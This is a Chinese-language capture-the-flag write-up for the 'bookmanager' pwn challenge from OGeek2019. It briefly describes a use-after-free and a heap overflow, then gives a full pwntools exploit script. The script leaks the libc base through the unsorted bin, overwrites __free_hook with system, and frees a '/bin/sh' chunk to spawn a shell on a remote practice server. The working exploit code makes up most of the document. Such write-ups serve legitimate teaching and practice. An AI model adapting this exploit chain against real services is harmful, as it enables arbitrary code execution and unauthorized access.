[OGeek2019]bookmanager
<p>[TOC]</p>
<h1>分析</h1>
<p>该题的漏洞还挺多的,我就找到了两个</p>
<p><img src="https://pic.imgdb.cn/item/63a8691e08b68301639b1efe.png" alt="" /> </p>
<p>Section删除存在UAF</p>
<p><img src="https://pic.imgdb.cn/item/63a8698c08b68301639bc129.png" alt="" /> </p>
<p>Text更新存在堆溢出,Chapter是申请一个0x90的chunk,Section是0x40的chunk,Text是小于0x100的chunk,那么我们可以释放Chapter,然后通过Text溢出来泄露unsortedbin地址,接着再申请几个Section直到有一个chunk申请到Text的chunk下,然后写入Section的Text指针为__free_hook,写入system</p>
<h1>Exploit</h1>
<pre><code>from pwn import*
# context.log_level = 'debug'
# o = process('./pwn')
o = remote('node4.buuoj.cn', 29446)
libc = ELF('./libc-2.23.so')
o.sendlineafter('Name of the book you want to create: ', 'name')
def addChapter(name):
o.sendlineafter('Your choice:', '1')
o.sendlineafter('Chapter name:', name)
def addSection(chapter, section):
o.sendlineafter('Your choice:', '2')
o.sendlineafter('Which chapter do you want to add into:', chapter)
addr = int(o.recvline()[2:-1], 16)
o.sendlineafter('Section name:', section)
return addr
def addText(section, num, text):
o.sendlineafter('Your choice:', '3')
o.sendlineafter('Which section do you want to add into:', section)
o.sendlineafter('How many chapters you want to write:', str(num))
o.sendlineafter('Text:', text)
def rmChapter(chapter):
o.sendlineafter('Your choice:', '4')
o.sendlineafter('Chapter name:', chapter)
def rmSection(section):
o.sendlineafter('Your choice:', '5')
o.sendlineafter('Section name:', section)
def rmText(section):
o.sendlineafter('Your choice:', '6')
o.sendlineafter('Section name:', section)
def updateSection(section, text):
o.sendlineafter('Your choice:', '8')
o.sendlineafter('What to update?(Chapter/Section/Text):', 'Section')
o.sendlineafter('Section name:', section)
o.sendlineafter('New Section name:', text)
def updateText(section, text):
o.sendlineafter('Your choice:', '8')
o.sendlineafter('What to update?(Chapter/Section/Text):', 'Text')
o.sendlineafter('Section name:', section)
o.sendlineafter('New Text:', text)
# 泄露unsorted bin
addChapter('a'*8)
addSection('a'*8, 'b'*8)
addText('b'*8, 0xf0, 'd'*6)
addChapter('e'*8)
addSection('e'*8, 'f'*8)
rmChapter('e'*8)
updateText('b'*8, 'd'*0x100)
o.sendlineafter('Your choice:', '7')
o.recvuntil("d"*0x100)
malloc_hook = u64(o.recv(6)+"\x00\x00") - 0x68
libc_base = malloc_hook - libc.sym['__malloc_hook']
log.info("libc_base: %x", libc_base)
free_hook = libc.sym['__free_hook'] + libc_base
system = libc.sym['system'] + libc_base
# 申请到Text之下的Section然后溢出写入__free_hook,再写入__free_hook system
updateText('b'*8, 'd'*0xf0+p64(0)+p64(0x91))
rmText('b'*8)
addText('b'*8, 0x10, 'cccc')
addSection('a'*8, 'h'*8)
addSection('a'*8, '/bin/sh\x00')
updateText('b'*8, p64(0)*3 + p64(0x41) + '/bin/sh\x00' + p64(0)*3 + p64(free_hook))
updateText('/bin/sh\x00', p64(system))
# 获取shell
rmSection('/bin/sh\x00')
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63a86a7508b68301639d6153.png" alt="" /></p>